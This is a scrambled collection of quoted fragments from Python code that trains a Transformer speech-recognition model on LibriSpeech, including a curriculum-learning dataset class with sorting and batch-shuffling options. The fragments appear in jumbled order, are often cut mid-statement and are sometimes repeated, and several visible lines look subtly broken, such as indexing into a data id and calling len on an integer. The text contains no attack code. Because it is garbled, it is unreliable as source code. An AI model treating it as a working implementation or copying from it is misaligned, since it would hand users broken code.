loss_ctc, loss_seq def", "of ``fit_batch()`` uses ``clip_grad_norm_`` with this value. Default: ``5``. nonfinite_patience (int) Number of", "= self.data[key1][\"wrd\"] text2 = self.data[key2][\"wrd\"] if text1 > text2: return 1 elif text1", "`key` returned data points as equal, continue # comparing using the next key,", "to SGD self.check_and_reset_optimizer() predictions = self.compute_forward(batch, sb.Stage.TRAIN) loss, loss_ctc, loss_seq = self.compute_objectives(predictions, batch,", "system employs an encoder, a decoder, and an attention mechanism between them. Decoding", "tokenizer as we need it to encode the labels when creating # mini-batches.", "with limited capacity # and no LM to give user some idea of", "} self.hparams.train_logger.log_stats( stats_meta=epoch_stats, train_stats=self.train_stats, valid_stats=stage_stats, ) self.checkpointer.save_and_keep_only( meta={\"ACC\": stage_stats[\"ACC\"], \"epoch\": epoch}, max_keys=[\"ACC\"], num_to_keep=5,", "take one of three values * ``-1`` - Use curriculum learning for all", "\"input_length:asc,output_length:desc\" - Sort the dataset using ``input_length`` in ascending order , tie is", "function prepares the datasets to be used in the brain class. It also", "not None, only keep (at most) the first n filtered data_points. The possible", "interrupted. inter_epoch_dataset_updation : bool Whether dataset must be updated every between epochs or", "in epoch_counter: # Training stage self.on_stage_start(Stage.TRAIN, epoch) self.modules.train() # Reset nonfinite count to", "\"contiguous\": pass elif batch_selection == \"random\": weights = self._random_shuffled_batches(weights, batch_size) elif batch_selection ==", "= self.fit_batch(batch) self.avg_train_loss = self.update_average( loss, self.avg_train_loss ) t.set_postfix(train_loss=self.avg_train_loss) # Write training summary", "hparams = load_hyperpyyaml(fin, overrides) # If distributed_launch=True then # create ddp_group with the", "\"\"\"Get a filtered and/or sorted version of this based on specified curriculum, shares", "- Sort the dataset using ``input_length`` in ascending order , tie is broken", "debug_epochs (int) Number of epochs to run in debug mode, Default ``2``. If", "hyps, _ = self.hparams.valid_search(enc_out.detach(), wav_lens) elif stage == sb.Stage.TEST: hyps, _ = self.hparams.test_search(enc_out.detach(),", "stage): \"\"\"Forward computations from the waveform batches to the output probabilities.\"\"\" batch =", "the right communication protocol sb.utils.distributed.ddp_init_group(run_opts) # 1. # Dataset prep (parsing Librispeech) from", "at the end of a epoch. This is used to handle , whether", ": 8, int Used to divide the dataset into batches. This helps in", "filtering and sorting steps don't need to compute the dynamic items twice. Arguments", "t: # cnt = 0 # for batch in t: # # print(batch.duration)", "dynamic items may be expensive, and this way the filtering and sorting steps", "0: continue else: return res return res shuffled_data_ids = self._random_shuffle_data_ids(data_ids) sorted_data_ids = sorted(shuffled_data_ids,key=cmp_to_key(compare))", "training. Default: ``False``. ckpt_interval_minutes (float) Amount of time between saving intra-epoch checkpoints, in", "valid_set : Dataset, DataLoader A set of data to use for validation. If", "Dataloader using the weights filtered_sorted_ids = self._weighted_filtered_sorted_ids( weights, min_weight, max_weight, select_n ) return", "current_optimizer = self.optimizer if current_epoch > self.hparams.stage_one_epochs: del self.optimizer self.optimizer = self.hparams.SGD(self.modules.parameters()) #", "None: return weights if isinstance(min_value,int): min_value = float(min_value) if isinstance(max_value,int): max_value = float(max_value)", "for epoch in epoch_counter: # Training stage self.on_stage_start(Stage.TRAIN, epoch) self.modules.train() # Reset nonfinite", "None batch_selection : str Information on how to order batches. - Possible Values", "return 0 class ASR(sb.core.Brain): r\"\"\"Brain class abstracts away the details of data loops.", "steps = self.hparams.noam_annealing.n_steps optimizer = self.optimizer.__class__.__name__ else: lr = self.hparams.lr_sgd steps = -1", "index,id in enumerate(shuffled_ids): weights[id] = index return weights def _random_shuffled_batches( self, weights=None, batch_size=8,", "network is trained on both CTC and negative-log likelihood targets and sub-word units", "return sig sb.dataio.dataset.add_dynamic_item(datasets, audio_pipeline) # 3. Define text pipeline: @sb.utils.data_pipeline.takes(\"wrd\") @sb.utils.data_pipeline.provides( \"wrd\", \"tokens_list\",", "tqdm.contrib import tqdm import numpy as np from functools import cmp_to_key from torch.utils.data", "\"\"\"Create `weights` for data points using `ordering_info`\"\"\" def compare(key1,key2): \"\"\" Comparing logic, as", "super().on_fit_start() # if the model is resumed from stage two, reinitialize the optimizer", "when sorting do not shuffle in dataloader ! otherwise is pointless hparams[\"train_dataloader_opts\"][\"shuffle\"] =", "None current_epoch = self.hparams.epoch_counter.current if current_epoch % self.hparams.valid_search_interval == 0: # for the", "weight(s) will be used to sort the dataset. ordering_info : str Information to", "checkpointer=None, inter_epoch_dataset_updation=False, sortagrad=-1 ): super().__init__( modules=modules, opt_class=opt_class, hparams=hparams, run_opts=run_opts, checkpointer=checkpointer ) # save", "(e.g, characters instead of BPE), training split (e.g, train-clean 100 rather than the", "dataset must be updated every between epochs or not. It is used in", "{} for index,data_id in enumerate(shuffled_data_ids): weights[data_id] = index return weights def _reverse_sort_batches( self,", "shuffled_data_ids = [] for batch in np.random.permutation(np.arange(batch_count)): start_index = batch_size * batch end_index", "check if we need to switch optimizer # if so change the optimizer", "key = ordering[\"key\"] order = 1 if ordering[\"order\"] == \"asc\" else -1 if", "yield tokens_eos tokens = torch.LongTensor(tokens_list) yield tokens sb.dataio.dataset.add_dynamic_item(datasets, text_pipeline) # 4. Set output:", "of decoder probabilities. The neural network is trained on both CTC and negative-log", "len(data_ids) , \"OOPS!! Batchwise shuffling gone wrong.\" weights = {} for index,data_id in", "on input length\"\"\" duration1 = float(self.data[key1][\"duration\"]) duration2 = float(self.data[key2][\"duration\"]) if duration1 > duration2:", "# # the path given in the YAML file). The tokenizer is loaded", "( current_epoch % valid_search_interval == 0 or stage == sb.Stage.TEST ): stage_stats[\"WER\"] =", "``fit()`` method, which iterates epochs and datasets for the purpose of \"fitting\" a", "= list(weights.keys()) for data_id in data_ids: data_id[weights[data_id]] = data_id data_count = len(data_ids) batch_count", ") if valid_set is not None and not ( isinstance(valid_set, DataLoader) or isinstance(valid_set,", "tokens (e.g, characters instead of BPE), training split (e.g, train-clean 100 rather than", "a set of modules to a set of data. In order to use", "if so change the optimizer from Adam to SGD self.check_and_reset_optimizer() predictions = self.compute_forward(batch,", "do not shuffle in dataloader ! otherwise is pointless # hparams[\"train_dataloader_opts\"][\"shuffle\"] = False", "is not None: self.on_stage_start(Stage.VALID, epoch) self.modules.eval() avg_valid_loss = 0.0 with torch.no_grad(): for batch", ") # here we create the datasets objects as well as tokenization and", "\"momentum\" not in group: return self.checkpointer.recover_if_possible( device=torch.device(self.device) ) def fit( self, epoch_counter, train_set,", "the checkpoints from last 5 epochs. The experiment file is flexible enough to", "``fit_batch()`` * ``evaluate_batch()`` Arguments --------- modules : dict of str:torch.nn.Module pairs These modules", "key_test={} ): \"\"\"Returns a list of data ids, fulfilling the filtering criteria.\"\"\" def", "- Example: * \"input_length:asc,output_length:desc\" - Sort the dataset using ``input_length`` in ascending order", "the tokenizer as we need it to encode the labels when creating #", "return loss , loss_ctc, loss_seq def fit_batch(self, batch): \"\"\"Train the parameters given a", "checkpoints # ACC is set to 1.1 so checkpointer only keeps the averaged", "This helps in ordering the dataset at batch level. select_n : None, int", "encoding train_data, valid_data, test_datasets, tokenizer = dataio_prepare(hparams) # # We download the pretrained", "self.checkpointer is not None: # do not reload the weights if training is", "in enumerate(data_ids): data_point = self.data[data_id] data_point[\"id\"] = data_id computed = self.pipeline.compute_outputs(data_point) if combined_filter(computed,", "if stage == sb.Stage.TRAIN: if hasattr(self.hparams, \"augmentation\"): feats = self.hparams.augmentation(feats) # forward modules", "and stage == sb.Stage.TRAIN: tokens_eos = torch.cat([tokens_eos, tokens_eos], dim=0) tokens_eos_lens = torch.cat( [tokens_eos_lens,", "ddp, this will generally handle multiprocess logic, like splitting the training data into", "default behavior does not match the use case. For a simple use case", "terms to words predicted_words = [ tokenizer.decode_ids(utt_seq).split(\" \") for utt_seq in hyps ]", "batch): \"\"\"Train the parameters given a single batch in input\"\"\" # check if", "validation summary to tensorboard self.tensorboard_writer.add_scalar(\"Validation/Loss/tot_loss\", avg_valid_loss, epoch) self.tensorboard_writer.add_scalar(\"Validation/Accuracy/tot_acc\", self.acc_metric.summarize(), epoch) # Only run", "valid_data.filtered_sorted(sort_key=\"duration\") # test is separate test_datasets = {} for csv_file in hparams[\"test_csv\"]: name", "= math.ceil(data_count / batch_size) shuffled_data_ids = [] for batch in np.flipud(np.arange(batch_count)): start_index =", "Default: ``False``. ckpt_interval_minutes (float) Amount of time between saving intra-epoch checkpoints, in minutes,", "output: sb.dataio.dataset.set_output_keys( datasets, [\"id\", \"sig\", \"wrd\", \"tokens_bos\", \"tokens_eos\", \"tokens\",\"duration\"], ) return train_data, valid_data,", "asr_brain.hparams.wer_file = os.path.join( hparams[\"output_folder\"], \"wer_{}.txt\".format(k) ) with torch.no_grad(): asr_brain.evaluate( test_datasets[k], max_key=\"ACC\", test_loader_kwargs=hparams[\"test_dataloader_opts\"], )", "alphabetic dataset_ordering = self._parse_dataset_order(ordering_info) ordering_type = \"sorted\" if len(dataset_ordering) > 0 else \"random\"", "return 0 def _alphabetic_comparator( self, key1, key2 ): \"\"\"Compare two data points based", "self.compute_objectives(predictions, batch, stage=stage) return loss.detach() def on_stage_start(self, stage, epoch): \"\"\"Gets called at the", "if interrupted if self.checkpointer is not None: # do not reload the weights", "train_set, stage=sb.Stage.TRAIN, **train_loader_kwargs ) if valid_set is not None and not ( isinstance(valid_set,", "hparams[\"tokenizer\"] # 2. Define audio pipeline: @sb.utils.data_pipeline.takes(\"wav\") @sb.utils.data_pipeline.provides(\"sig\") def audio_pipeline(wav): sig = sb.dataio.dataio.read_audio(wav)", "- key1 = key2 \"\"\" for ordering in dataset_orderings: key = ordering[\"key\"] order", "evaluation stage # delete the rest of the intermediate checkpoints # ACC is", "parameters (e.g. a lambda or partial function definition). By default, this will be", "or ( stage == sb.Stage.TEST ): # Decode token terms to words predicted_words", "handle , whether the dataset needs to be reshuffled at the end of", "# # print(batch.wrd) # # if cnt == 5: # # exit() #", "] return filtered_sorted_ids def _parse_dataset_order( self, dataset_order=\"\" ): \"\"\"Takes in `ordering_info` in string", "dataset. By, default, it is False sortagrad: int Number of epochs, for which", "normalize the loss by gradient_accumulation step (loss / self.hparams.gradient_accumulation).backward() if self.step % self.hparams.gradient_accumulation", "well as tokenization and encoding train_data, valid_data, test_datasets, tokenizer = dataio_prepare(hparams) # #", "\"tokens_bos\", \"tokens_eos\", \"tokens\" ) def text_pipeline(wrd): yield wrd tokens_list = tokenizer.encode_as_ids(wrd) yield tokens_list", "to be reshuffled at the end of epoch \"\"\" if self.inter_epoch_dataset_updation: if self.sortagrad", "ASR(sb.core.Brain): r\"\"\"Brain class abstracts away the details of data loops. The primary purpose", "copied from this, so they have the same dynamic items available) \"\"\" #", "create weights based on pre-defined keys( and/or methods) and their order. - Format", "sb.Stage.TEST ): # Decode token terms to words predicted_words = [ tokenizer.decode_ids(utt_seq).split(\" \")", "\"env_corrupt\") and stage == sb.Stage.TRAIN: tokens_eos = torch.cat([tokens_eos, tokens_eos], dim=0) tokens_eos_lens = torch.cat(", "valid_set=None, progressbar=None, train_loader_kwargs={}, valid_loader_kwargs={}, ): \"\"\"Iterate epochs and datasets to improve objective. Relies", "splitting the training data into subsets for each device and only saving a", "with a single dataset) the only methods that need to be overridden are:", "recreate dataset using preferred cl approach return else: if self.sortagrad != -1: #", "DataLoader A set of data to use for validation. If a Dataset is", ": dict Map from key (in data or in dynamic items) to func,", "for order: `asc`, `desc` - Example: * \"input_length:asc,output_length:desc\" - Sort the dataset using", ": dict of str:torch.nn.Module pairs These modules are passed to the optimizer by", "override any methods for which the default behavior does not match the use", "custom weights\"\"\" def weights_filter(weights,min_value,max_value): \"\"\"Checks if the data example has weight within the", "return 1 elif duration1 < duration2: return -1 else: return 0 def _output_length_comparator(", "other possible variations. Authors * <NAME> 2020 * <NAME> 2020 * <NAME> 2020", "is False sortagrad: int Number of epochs, for which curriculum based dataset be", "wav_lens, hyps,) = predictions ids = batch.id tokens_eos, tokens_eos_lens = batch.tokens_eos tokens, tokens_lens", "not None: # do not reload the weights if training is interrupted right", "attention mechanism between them. Decoding is performed with (CTC/Att joint) beamsearch coupled with", "ordering_type == \"random\": weights = self._random_shuffled_weights(filtered_data_ids) elif ordering_type == \"sorted\": if weights ==", "batches for all datasets, to ensure code runs without crashing. debug_batches (int) Number", "yield tokens_bos tokens_eos = torch.LongTensor(tokens_list + [hparams[\"eos_index\"]]) yield tokens_eos tokens = torch.LongTensor(tokens_list) yield", "in hyps ] target_words = [wrd.split(\" \") for wrd in batch.wrd] self.wer_metric.append(ids, predicted_words,", "batch_selection = hparams[\"batch_selection\"] batch_size = int(hparams[\"batch_size\"]) train_data = train_data.curriculum_based_filtered_sorted( ordering_info=ordering_info, batch_selection=batch_selection, batch_size=batch_size )", "of data ids, fulfilling the filtering criteria.\"\"\" def combined_filter(computed, key_min_value, key_max_value, key_test): \"\"\"Checks", "deep copied from this, so they have the same dynamic items available) \"\"\"", "be , input_length, output_length, alphabetic dataset_ordering = self._parse_dataset_order(ordering_info) ordering_type = \"sorted\" if len(dataset_ordering)", "ReproducibleRandomSampler from tqdm.contrib import tqdm import numpy as np from functools import cmp_to_key", "and the distributed_backend is ddp, this will generally handle multiprocess logic, like splitting", ": None, int If not None, will only keep data_point if weight[data_point] >", "and max_value == None: return weights if isinstance(min_value,int): min_value = float(min_value) if isinstance(max_value,int):", "LoopedLoader) ): valid_set = self.make_dataloader( valid_set, stage=sb.Stage.VALID, ckpt_prefix=None, **valid_loader_kwargs, ) self.on_fit_start() self.train_set =", "loss_ctc, global_step) self.tensorboard_writer.add_scalar(\"Train/Loss/att_loss\", loss_seq, global_step) # Debug mode only runs a few batches", "= self.make_dataloader( train_set, stage=sb.Stage.TRAIN, **train_loader_kwargs ) if valid_set is not None and not", "with torch.no_grad(): predictions = self.compute_forward(batch, stage=stage) loss, _, _ = self.compute_objectives(predictions, batch, stage=stage)", "the sake of efficiency, we only perform beamsearch with limited capacity # and", "LoopedLoader from speechbrain.core import Stage import time def make_dataloader( dataset, stage, ckpt_prefix=\"dataloader-\", **loader_kwargs,", "ctc log-probabilities logits = self.modules.ctc_lin(enc_out) p_ctc = self.hparams.log_softmax(logits) # output layer for seq2seq", "primary purpose of the `Brain` class is the implementation of the ``fit()`` method,", "math.ceil(data_count / batch_size) shuffled_data_ids = [] for batch in np.flipud(np.arange(batch_count)): start_index = batch_size", "sorted_data_ids = sorted(shuffled_data_ids,key=cmp_to_key(compare)) weights = {} for index,id in enumerate(sorted_data_ids): weights[id] = index", "hyps = None elif stage == sb.Stage.VALID: hyps = None current_epoch = self.hparams.epoch_counter.current", "available) \"\"\" # ordering type can be random, sorted # keys for ordering", "`contiguous`, `random`, `sorted`, `reverse-sorted` - Example: * \"random\" - After dataset is ordered", "at batch level\"\"\" data_ids = list(weights.keys()) for data_id in data_ids: data_id[weights[data_id]] = data_id", "If the initialization was done with distributed_count > 0 and the distributed_backend is", "loss, loss_ctc, loss_seq = self.fit_batch(batch) self.avg_train_loss = self.update_average( loss, self.avg_train_loss ) t.set_postfix(train_loss=self.avg_train_loss) #", "output_length, alphabetic dataset_ordering = self._parse_dataset_order(ordering_info) ordering_type = \"sorted\" if len(dataset_ordering) > 0 else", "pass elif batch_selection == \"random\": weights = self._random_shuffled_batches(weights, batch_size) elif batch_selection == \"sorted\":", "intra-epoch checkpoints, in minutes, default: ``15.0``. If non-positive, these are not saved. checkpointer", "ordering info weights = self._custom_sorted_weights(filtered_data_ids, dataset_ordering) else: pass else: raise NotImplementedError( \"Ordering Type", "can take one of three values * ``-1`` - Use curriculum learning for", "(str) The location for performing computations. auto_mix_prec (bool) If ``True``, automatic mixed-precision is", "of multiple functions that can (or should) be overridden. The following methods are", "sb from hyperpyyaml import load_hyperpyyaml from speechbrain.utils.distributed import run_on_main from speechbrain.dataio.dataset import DynamicItemDataset,", "* ``update_average()`` If the initialization was done with distributed_count > 0 and the", "batches if self.debug and self.step == self.debug_batches: break # Write validation summary to", "( isinstance(valid_set, DataLoader) or isinstance(valid_set, LoopedLoader) ): valid_set = self.make_dataloader( valid_set, stage=sb.Stage.VALID, ckpt_prefix=None,", "(list of str) List of keys in ``modules`` that should be jit compiled.", "4. Set output: sb.dataio.dataset.set_output_keys( datasets, [\"id\", \"sig\", \"wrd\", \"tokens_bos\", \"tokens_eos\", \"tokens\",\"duration\"], ) return", "\"tokens_eos\", \"tokens\",\"duration\"], ) return train_data, valid_data, test_datasets, tokenizer if __name__ == \"__main__\": #", "doing hyps, _ = self.hparams.valid_search(enc_out.detach(), wav_lens) elif stage == sb.Stage.TEST: hyps, _ =", "training a Transformer ASR system with librispeech. The system employs an encoder, a", "also defines the data processing pipeline through user-defined functions.\"\"\" data_folder = hparams[\"data_folder\"] #", "is not fini self.check_gradients(loss) self.optimizer.step() self.optimizer.zero_grad() # anneal lr every update self.hparams.noam_annealing(self.optimizer) return", "loss_ctc, loss_seq def fit_batch(self, batch): \"\"\"Train the parameters given a single batch in", "using \"dot\" notation: e.g., self.hparams.model(x). run_opts : dict A set of options to", "self.hparams.model(x). run_opts : dict A set of options to change the runtime environment,", "log stats and save checkpoint at end-of-epoch if stage == sb.Stage.VALID and sb.utils.distributed.if_main_process():", "the filtering and sorting steps don't need to compute the dynamic items twice.", "\"tokens_list\", \"tokens_bos\", \"tokens_eos\", \"tokens\" ) def text_pipeline(wrd): yield wrd tokens_list = tokenizer.encode_as_ids(wrd) yield", "which the default behavior does not match the use case. For a simple", "any methods for which the default behavior does not match the use case.", "a few batches for all datasets, to ensure code runs without crashing. debug_batches", "def _custom_sorted_weights( self, data_ids, dataset_orderings ): \"\"\"Create `weights` for data points using `ordering_info`\"\"\"", "hyperparams_to_save=hparams_file, overrides=overrides, ) # multi-gpu (ddp) save data preparation run_on_main( prepare_librispeech, kwargs={ \"data_folder\":", "probabilities. The neural network is trained on both CTC and negative-log likelihood targets", "the optimizer from Adam to SGD self.check_and_reset_optimizer() predictions = self.compute_forward(batch, sb.Stage.TRAIN) loss, loss_ctc,", "= sb.dataio.dataset.DynamicItemDataset.from_csv( # csv_path=hparams[\"train_csv\"], replacements={\"data_root\": data_folder}, # ) train_data = CurriculumOrientedDynamicDataset.from_csv( csv_path=hparams[\"train_csv\"], replacements={\"data_root\":", "batch in np.random.permutation(np.arange(batch_count)): start_index = batch_size * batch end_index = min((batch_size+1)*batch, len(data_count)) shuffled_data_ids", "self.optimizer) self.switched = True def on_fit_start(self): \"\"\"Initialize the right optimizer on the training", "replacements={\"data_root\": data_folder}, ) ordering_info = hparams[\"ordering\"] batch_selection = hparams[\"batch_selection\"] batch_size = int(hparams[\"batch_size\"]) train_data", "self._weighted_filtered_sorted_ids( weights, min_weight, max_weight, select_n ) return FilteredSortedDynamicItemDataset( self, filtered_sorted_ids ) def _filter_dataset(", "self.wer_metric.write_stats(w) # save the averaged checkpoint at the end of the evaluation stage", "weights = self._custom_sorted_weights(filtered_data_ids, dataset_ordering) else: pass else: raise NotImplementedError( \"Ordering Type must be", "coupled with a Transformer language model is used on the top of decoder", "batch in np.flipud(np.arange(batch_count)): start_index = batch_size * batch end_index = min((batch_size+1)*batch, len(data_count)) shuffled_data_ids", "self.hparams.noam_annealing(self.optimizer) return loss.detach() , loss_ctc.detach(), loss_seq.detach() def evaluate_batch(self, batch, stage): \"\"\"Computations needed for", "with distributed_count > 0 and the distributed_backend is ddp, this will generally handle", "): \"\"\"Takes in `ordering_info` in string as input and creates a dictionary out", "``False``. ckpt_interval_minutes (float) Amount of time between saving intra-epoch checkpoints, in minutes, default:", "ordering[\"key\"] order = 1 if ordering[\"order\"] == \"asc\" else -1 if key ==", "the right optimizer on the training start\"\"\" super().on_fit_start() # if the model is", "tokens_bos = torch.cat([tokens_bos, tokens_bos], dim=0) # compute features feats = self.hparams.compute_features(wavs) current_epoch =", "dataloader ! otherwise is pointless hparams[\"train_dataloader_opts\"][\"shuffle\"] = False # if hparams[\"sorting\"] == \"ascending\":", "saving a checkpoint on the main process. Arguments --------- epoch_counter : iterable Each", "self.data[data_id] data_point[\"id\"] = data_id computed = self.pipeline.compute_outputs(data_point) if combined_filter(computed, key_min_value, key_max_value, key_test): filtered_data_ids.append(data_id)", "enumerate(data_ids): data_point = self.data[data_id] data_point[\"id\"] = data_id computed = self.pipeline.compute_outputs(data_point) if combined_filter(computed, key_min_value,", "train_data.filtered_sorted(sort_key=\"duration\") # # when sorting do not shuffle in dataloader ! otherwise is", "predictions = self.compute_forward(batch, stage=stage) loss, _, _ = self.compute_objectives(predictions, batch, stage=stage) return loss.detach()", "self.nonfinite_count = 0 if self.train_sampler is not None and hasattr( self.train_sampler, \"set_epoch\" ):", "a Dataset, not DataLoader). E.g., batch_size, num_workers. DataLoader kwargs are all valid. progressbar", "run_on_main( self.on_stage_end, args=[Stage.VALID, avg_valid_loss, epoch], ) # Debug mode only runs a few", "# Training asr_brain.fit( asr_brain.hparams.epoch_counter, train_data, valid_data, train_loader_kwargs=hparams[\"train_dataloader_opts\"], valid_loader_kwargs=hparams[\"valid_dataloader_opts\"], ) # Testing for k", "dataset using preferred cl approach return else: if self.sortagrad != -1: # number", "run_opts=run_opts, checkpointer=hparams[\"checkpointer\"], ) # adding objects to trainer: asr_brain.tokenizer = hparams[\"tokenizer\"] # Training", "def recreate_train_dataset(self,epoch): \"\"\"Gets called at the end of a epoch. This is used", "used to sort the dataset. ordering_info : str Information to create weights based", "data preparation run_on_main( prepare_librispeech, kwargs={ \"data_folder\": hparams[\"data_folder\"], \"tr_splits\": hparams[\"train_splits\"], \"dev_splits\": hparams[\"dev_splits\"], \"te_splits\": hparams[\"test_splits\"],", "targets and sub-word units estimated with Byte Pairwise Encoding (BPE) are used as", "1 elif length1 < length2: return -1 else: return 0 def _alphabetic_comparator( self,", "= inter_epoch_dataset_updation self.ordering = self.hparams.ordering self.batch_selection = self.hparams.batch_selection self.sortagrad = sortagrad # create", "a Dataset is given, a DataLoader is automatically created. If a DataLoader is", "rest of the intermediate checkpoints # ACC is set to 1.1 so checkpointer", "(at most) the first n filtered data_points. The possible sorting is applied, but", "keys in ``modules`` that should be jit compiled. distributed_count (int) Number of devices", "and no LM to give user some idea of how the AM is", "the purpose of \"fitting\" a set of modules to a set of data.", "hparams[\"data_folder\"] # train_data = sb.dataio.dataset.DynamicItemDataset.from_csv( # csv_path=hparams[\"train_csv\"], replacements={\"data_root\": data_folder}, # ) train_data =", "optimizer constructor that has takes only the list of parameters (e.g. a lambda", "initial=0, # dynamic_ncols=True, # disable=False, # ) as t: # cnt = 0", "import sys import logging from pathlib import Path import speechbrain as sb from", "batch_selection=\"contiguous\", batch_size=8, select_n=None, ): \"\"\"Get a filtered and/or sorted version of this based", "> min_weight max_weight : None, int If not None, will only keep data_point", "key_max_value.items(): if computed[key] <= limit: continue return False for key, func in key_test.items():", ": Dataset, DataLoader A set of data to use for training. If a", "last_ckpt_time = time.time() # Run train \"on_stage_end\" on all processes self.on_stage_end(Stage.TRAIN, self.avg_train_loss, epoch)", "= self.hparams.augmentation(feats) # forward modules src = self.modules.CNN(feats) enc_out, pred = self.modules.Transformer( src,", "save checkpoint at end-of-epoch if stage == sb.Stage.VALID and sb.utils.distributed.if_main_process(): # report different", "* ``n`` - Use curriculum learning for ``n`` number of epochs By default,", "batch_size=8, reverse=False ): \"\"\"Randomly shuffle the dataset at batch level\"\"\" data_ids = list(weights.keys())", "0 and time.time() - last_ckpt_time >= self.ckpt_interval_minutes * 60.0 ): run_on_main(self._save_intra_epoch_ckpt) last_ckpt_time =", "\"\"\" if not ( isinstance(train_set, DataLoader) or isinstance(train_set, LoopedLoader) ): train_set = self.make_dataloader(", "torch.cat([tokens, tokens], dim=0) tokens_lens = torch.cat([tokens_lens, tokens_lens], dim=0) loss_seq = self.hparams.seq_cost( p_seq, tokens_eos,", "expected to have a certain behavior: * ``fit_batch()`` * ``evaluate_batch()`` * ``update_average()`` If", "overridden are: * ``compute_forward()`` * ``compute_objectives()`` The example below illustrates how overriding these", "\"wer_{}.txt\".format(k) ) with torch.no_grad(): asr_brain.evaluate( test_datasets[k], max_key=\"ACC\", test_loader_kwargs=hparams[\"test_dataloader_opts\"], ) # # print(train_data) #", "The primary purpose of the `Brain` class is the implementation of the ``fit()``", "Whether to turn off progressbar when training. Default: ``False``. ckpt_interval_minutes (float) Amount of", "into batches of size `batch_size` and order these batches randomly to create final", "elif key == \"output_length\": res = self._output_length_comparator(key1,key2) elif key == \"alphabetic\": res =", "dim=0) # compute features feats = self.hparams.compute_features(wavs) current_epoch = self.hparams.epoch_counter.current feats = self.modules.normalize(feats,", "dataset is ordered based on `ordering_info`, divide the dataset into batches of size", "if isinstance(max_value,int): max_value = float(max_value) for key,value in weights.items(): if (isinstance(min_value,float) and value", "in test_datasets.keys(): # keys are test_clean, test_other etc asr_brain.hparams.wer_file = os.path.join( hparams[\"output_folder\"], \"wer_{}.txt\".format(k)", "used to handle , whether the dataset needs to be reshuffled at the", "\"lr\": lr, \"steps\": steps, \"optimizer\": optimizer, } self.hparams.train_logger.log_stats( stats_meta=epoch_stats, train_stats=self.train_stats, valid_stats=stage_stats, ) self.checkpointer.save_and_keep_only(", "mode only runs a few epochs if self.debug and epoch == self.debug_epochs: break", "!= sb.Stage.TRAIN: current_epoch = self.hparams.epoch_counter.current valid_search_interval = self.hparams.valid_search_interval if current_epoch % valid_search_interval ==", "for ordering info can be , input_length, output_length, alphabetic dataset_ordering = self._parse_dataset_order(ordering_info) ordering_type", "a Dataset, not DataLoader). E.G. batch_size, num_workers. DataLoader kwargs are all valid. valid_loader_kwargs", "train_set : Dataset, DataLoader A set of data to use for training. If", "has its own output keys and dynamic items (initially deep copied from this,", "use for validation. If a Dataset is given, a DataLoader is automatically created.", "avg_valid_loss = self.update_average( loss, avg_valid_loss ) # Debug mode only runs a few", "num_workers. DataLoader kwargs are all valid. progressbar : bool Whether to display the", "Amount of time between saving intra-epoch checkpoints, in minutes, default: ``15.0``. If non-positive,", "(isinstance(min_value,float) and value < min_value) or \\ (isinstance(max_value,float) and value > max_value): weights.pop(key,None)", "**loader_kwargs, ): # TRAIN stage is handled specially. dataloader = sb.dataio.dataloader.make_dataloader( dataset, **loader_kwargs", "# Run train \"on_stage_end\" on all processes self.on_stage_end(Stage.TRAIN, self.avg_train_loss, epoch) self.avg_train_loss = 0.0", "modules src = self.modules.CNN(feats) enc_out, pred = self.modules.Transformer( src, tokens_bos, wav_lens, pad_idx=self.hparams.pad_index )", "@sb.utils.data_pipeline.provides( \"wrd\", \"tokens_list\", \"tokens_bos\", \"tokens_eos\", \"tokens\" ) def text_pipeline(wrd): yield wrd tokens_list =", "tokens. Training is performed on the full LibriSpeech dataset (960 h). The best", "weights[data_id] = index return weights def _reverse_sort_batches( self, weights=None, batch_size=8 ): \"\"\"Reverse sort", "super().on_evaluate_start() ckpts = self.checkpointer.find_checkpoints( max_key=max_key, min_key=min_key ) ckpt = sb.utils.checkpoints.average_checkpoints( ckpts, recoverable_name=\"model\", device=self.device", "= None if stage == sb.Stage.TRAIN: hyps = None elif stage == sb.Stage.VALID:", "if the model is resumed from stage two, reinitialize the optimizer current_epoch =", "meaning * 1 - key1 > key2 * -1 - key1 < key2", "run_opts=None, checkpointer=None, inter_epoch_dataset_updation=False, sortagrad=-1 ): super().__init__( modules=modules, opt_class=opt_class, hparams=hparams, run_opts=run_opts, checkpointer=checkpointer ) #", "dynamic_ncols=True, disable=not enable ): self.step += 1 loss = self.evaluate_batch(batch, stage=Stage.VALID) avg_valid_loss =", "p_seq, wav_lens, hyps def compute_objectives(self, predictions, batch, stage): \"\"\"Computes the loss (CTC+NLL) given", "stage != sb.Stage.TRAIN: current_epoch = self.hparams.epoch_counter.current valid_search_interval = self.hparams.valid_search_interval if current_epoch % valid_search_interval", "0 if self.train_sampler is not None and hasattr( self.train_sampler, \"set_epoch\" ): self.train_sampler.set_epoch(epoch) #", "parameter files, you can try different encoders, decoders, tokens (e.g, characters instead of", "divide the dataset into batches of size `batch_size` and order these batches randomly", "data_count = len(data_ids) batch_count = math.ceil(data_count / batch_size) shuffled_data_ids = [] for batch", "By default, this will be used to load checkpoints, and will have the", "not None and self.ckpt_interval_minutes > 0 and time.time() - last_ckpt_time >= self.ckpt_interval_minutes *", "lr = self.hparams.noam_annealing.current_lr steps = self.hparams.noam_annealing.n_steps optimizer = self.optimizer.__class__.__name__ else: lr = self.hparams.lr_sgd", "Example: * \"random\" - After dataset is ordered based on `ordering_info`, divide the", "[tokens_eos_lens, tokens_eos_lens], dim=0 ) tokens = torch.cat([tokens, tokens], dim=0) tokens_lens = torch.cat([tokens_lens, tokens_lens],", "tokens = torch.LongTensor(tokens_list) yield tokens sb.dataio.dataset.add_dynamic_item(datasets, text_pipeline) # 4. Set output: sb.dataio.dataset.set_output_keys( datasets,", "current_epoch = self.hparams.epoch_counter.current if current_epoch % self.hparams.valid_search_interval == 0: # for the sake", "dict A set of options to change the runtime environment, including debug (bool)", "in descending order Note: This is used only if `weights` is None batch_selection", "the optimizer current_epoch = self.hparams.epoch_counter.current current_optimizer = self.optimizer if current_epoch > self.hparams.stage_one_epochs: del", "example has weight within the range (`min_value`, `max_value`)\"\"\" if min_value == None and", "_weighted_filtered_sorted_ids( self, weights, min_value=None, max_value=None, select_n=None, reverse=False ): \"\"\"Returns a list of data", "tokenizer.decode_ids(utt_seq).split(\" \") for utt_seq in hyps ] target_words = [wrd.split(\" \") for wrd", "epoch): \"\"\"Gets called at the beginning of each epoch\"\"\" if stage != sb.Stage.TRAIN:", "/ batch_size) shuffled_data_ids = [] for batch in np.flipud(np.arange(batch_count)): start_index = batch_size *", "initial=self.step, dynamic_ncols=True, disable=not enable, ) as t: for batch in t: self.step +=", "on the full LibriSpeech dataset (960 h). The best model is the average", "max_weight, select_n ) return 